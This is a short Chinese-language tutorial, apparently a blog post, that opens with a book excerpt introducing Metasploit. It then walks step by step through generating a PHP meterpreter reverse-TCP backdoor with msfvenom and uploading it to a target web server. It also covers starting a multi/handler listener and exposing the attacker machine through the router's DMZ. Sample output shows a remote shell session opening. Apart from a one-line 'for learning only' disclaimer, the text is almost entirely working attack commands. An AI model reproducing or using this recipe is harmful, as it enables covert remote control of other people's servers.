Metasploit簡介
灰帽駭客(第3版) Metasploit是一個免費的、可下載的架構,通過它可以很容易地擷取、開發並對電腦軟體漏洞實施攻擊。它本身附帶數百個已知軟體漏洞的專業級漏洞攻擊工具。當H.D. Moore在2003年發布Metasploit時,電腦安全狀況也被永久性地改變了。彷彿一夜之間,任何人都可以成為駭客,每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟體廠商再也不能延遲發布針對已公布漏洞的補丁了,這是因為Metasploit團隊一直都在努力開發各種攻擊工具,並將它們貢獻給所有Metasploit使用者
metasploit架構PHP反向後門建立
msfvenom -l 查看所有payload
Framework Payloads (436 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
其他的省略。
這裡要使用的是PHP反向後門
msfvenom -p php/meterpreter/reverse_tcp --payload-options 查看參數
Options for payload/php/meterpreter/reverse_tcp:
Name: PHP Meterpreter, PHP Reverse TCP Stager
Module: payload/php/meterpreter/reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 936
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in PHP. Reverse PHP connect back stager
with checks for disabled functions
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 產生指令碼
產生後要將指令碼最前面的注釋符去掉,然後上傳到目標伺服器上
啟動msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 啟動監聽
然後從瀏覽器中開啟上傳的指令碼http://xxx.com/c.php
msf中就會看到
*] Starting the payload handler...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
meterpreter >
如果kali安裝在虛擬機器上,需要橋接,然後路由器上將kali DMZ到外網
注意:此教程只用於學習使用其它一切後果與本站無前